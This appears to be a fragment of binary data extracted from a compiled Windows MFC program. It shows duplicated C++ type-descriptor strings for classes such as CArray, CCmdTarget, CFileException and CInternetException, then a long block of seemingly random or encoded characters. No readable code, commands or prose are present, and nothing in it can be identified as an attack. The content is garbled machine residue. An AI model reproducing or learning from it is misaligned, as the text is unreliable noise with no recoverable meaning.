zcÁ

.?AV?$CArray@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@ABV12@@@

.?AV?$CArray@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@ABV12@@@

.?AVCCmdTarget@@

.?AVCCmdTarget@@

.PAVCFileException@@

.PAVCFileException@@

.PAVCInternetException@@

.PAVCInternetException@@

X!CCA[ttJBoorLbbH~mm1gNNwWww1g00JyggK gglIttG3MMBnoo4MNNhvllvL00O'WW2add1?XXc~jj4]ooKuSSA)XXNDVVu(ppJcEE6 mmKxgg89nnH?nn4EXX2dUU16vvsiLLZ(vvx$jj38CCfeee3$ppNCjjg_xxfEggZXWWr{jjw^uuwd66N,jjGuXX2{ppz"llb%WWe5llG3WW1awwV%mmv8II6dbbcllaivvwRqqwwwwweddy7oozIXXkNvvwtRRh*QQZ]VVWKnnA2wwPVSSf)ggdPSSG/gg1?XXwC33oFxxx.ggaXQQv2ttN XXA}ddBruueqLLueSSwpNNpibbGxlluVuux?dd8,QQc$ddzlllJvjjB,ggd 66r)ppJoIIADxxw RRophhJ,RRT8ggw7ddd0ccJ5XXPxnnJ/uu1iWWwfIIocll33uu2{ood1xxZZllNTXXpSCCe%IIvpWWwrNNB4SSGoVVBwwwJ.XXz&nnZVxxglWWZHxx2pWWf}XXw&WWr/VV1gllBBwwEymme&VVl mmZRnnqMkkruFF3`ccNUggIOppsdLLoKmmHGggHwWWvURsnnNyNNu>XXf$xxTIppfEbb5=ooG4XXP8XXcjqqq2WWvGRRvoWWfnVVMqllf-RRLRuuc%jjw9ll4Yddz_XXfsooNwooB.nnshbbJ(bb6#uuH/ggw(kkz?jj1Tbbv'oo2XCCvxxHhXXHm33eDxx25112/xxJB66yGggc:ttRpggcVnnkxnn4RxxlGSSG,qqIYhhJzjj5cppw@33gFnn3!NNm*bbc!jjqvXXr?ggsPppfYNNWXmmfPIIR"hhJw66pHQQeMttJ@jjeAXXOFmmeWII6.oow/LLGpuuwuUUZ[vvdMHH1YppNSlllfuuAQLLH?SS4:ee4}jjG ee3Fkke#IIP@xxzJggjhttc%qq4AXXp&ggOKwwd$llG8pp4$bb6Tmme